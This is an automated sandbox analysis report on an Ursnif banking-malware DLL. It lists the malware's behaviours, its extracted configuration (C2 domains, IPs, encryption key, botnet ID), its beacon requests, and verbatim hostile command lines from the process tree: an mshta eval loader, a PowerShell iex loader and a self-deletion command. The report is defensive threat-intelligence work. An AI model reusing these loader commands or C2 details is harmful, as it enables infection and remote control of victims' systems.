Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
628df1368bdb5.dll

Overview

General Information

Sample Name:628df1368bdb5.dll
Analysis ID:633910
MD5:2ced3a825a7b8d9ad0153b2f8566b357
SHA1:4b6484602c29c298b5270f2c95e9aeeabb162737
SHA256:f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc
Tags:BRTdllgoziisfbitaursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 3412 cmdline: loaddll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4800 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 864 cmdline: rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 1308 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 240 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5264 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 416 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 440 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6924 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 1048 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5280 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3864 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6988 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\628df1368bdb5.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 240 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.51294a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.2.rundll32.exe.1350000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.56fa4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.56fa4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.51294a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.4176.10.119.6849770802033204 05/25/22-11:18:02.070939
                      SID:2033204
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.413.107.43.1649761802033204 05/25/22-11:17:41.032657
                      SID:2033204
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.4176.10.119.6849770802033203 05/25/22-11:18:02.070939
                      SID:2033203
                      Source Port:49770
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.413.107.43.1649761802033203 05/25/22-11:17:41.032657
                      SID:2033203
                      Source Port:49761
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
                      Antivirus detection for URL or domain
                      Source: http://176.10.119.68/Avira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/Avira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/=i_Avira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlkAvira URL Cloud: Label: phishing
                      Source: http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VAvira URL Cloud: Label: phishing
                      Machine Learning detection for sample
                      Source: 628df1368bdb5.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01355FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: 628df1368bdb5.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.337566379.000000000040D000.00000002.00000001.01000000.00000003.sdmp, 628df1368bdb5.dll
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.390410461.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.393947886.00000000065C0000.00000004.00001000.00020000.00000000.sdmp

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.10.119.68 80
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49761 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49761 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49770 -> 176.10.119.68:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49770 -> 176.10.119.68:80
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: AS-SOFTPLUSCH AS-SOFTPLUSCH
                      Source: global trafficHTTP traffic detected: GET /drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: rundll32.exe, 00000002.00000003.339926969.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329887519.0000000003510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/
                      Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/=i_
                      Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453537625.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4V
                      Source: rundll32.exe, 00000002.00000003.339948557.0000000003518000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453772762.0000000003518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/
                      Source: rundll32.exe, 00000002.00000003.329876196.00000000034F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329894971.0000000003518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.10.119.68/drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2Fxy
                      Source: rundll32.exe, 00000002.00000002.453750425.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.339926969.0000000003510000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.329887519.0000000003510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/A_2BLeg1fA0RcX1Q_2Fs1Y_/2FCJSPM_2B/VSOjJXByZGfS4f_2F/gMPMt_2Fx85L/
                      Source: rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 0000001A.00000003.466381408.0000021CC386D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000001A.00000002.469002593.0000021CAB3F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000001A.00000002.469383609.0000021CAB5FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000001A.00000002.506776639.0000021CBB453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_01351CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global trafficHTTP traffic detected: GET /drew/mx2k_2BWD8_2Bui8f24/_2FdLStLGJu_2FNVLvlRqm/y6X2_2B4jlk2h/VQfu7A_2/B4a_2FxyofSjr6xGLTFfL2L/LNdngFf7rn/OvqAM3OC3xoRemh_2/FyMZKFMI26Y0/0mKxky2p8Sr/xj69YBE0ZOhFjW/zbyinwlKMAyzoBoDXw0WW/UcxtZ3YMxhs_2F9U/e4Hd9_2BGaNBJ3P/kN1X2IxLZzGc_2FIhp/HoxIXKFKE/9P_2FQckxF3sFvknjRk2/jU7nTpV83y_2Bc9IDLG/XJnktZ5U4942/cCc.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/9bo_2FGMDS/YX0iJpZn_2FnwDqZp/_2FkwYeVsi9m/tZW52eiU7bn/plbRkJU1Vd8To_/2Fp4VORrrB3C9OpiAUTKW/_2BEa68ZWZM_2F_2/FqQsrqaBoVKq7cT/nta4A0Rkv0C0nGFGba/jEcMhAfEj/i4t0z7q_2FtZbIXHHqGR/Q5KFjk2yTnVCetqf4Mv/o6_2BrnNfrIeaxRno6ljgz/e3ndGuwsYbRUB/3DL_2FNd/OjZb2_2BjErlndqGe5NpZyj/jIT9OJzbG0/KOr4XWJQo/_2FUsze0HrV/HT.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/9wrEMOTFT/S91lCHc0I9lpMiqK6tED/3HmXCi0GHvk2bfJZ_2B/IWJ0PIriQTQ6c2m4hiKbFG/j7Ui6TupUgqv9/iXqd_2B6/HweqhRNKjLTfXm8aJ5EbULO/aj_2BCnAUF/p4g6MIba6j8L3cgyw/IecwOJcZqkV3/20iagORn0JW/8cL4QeYiL7dSmN/XiKK0HtesQsvb3dvhwxKN/_2FxNHFHozoDft4H/q_2F2UJyAbE0bmM/3E7KjzSrWV7DjWoo4u/DAXZOu_2FTcV_2B8l/611kp.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 176.10.119.68Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
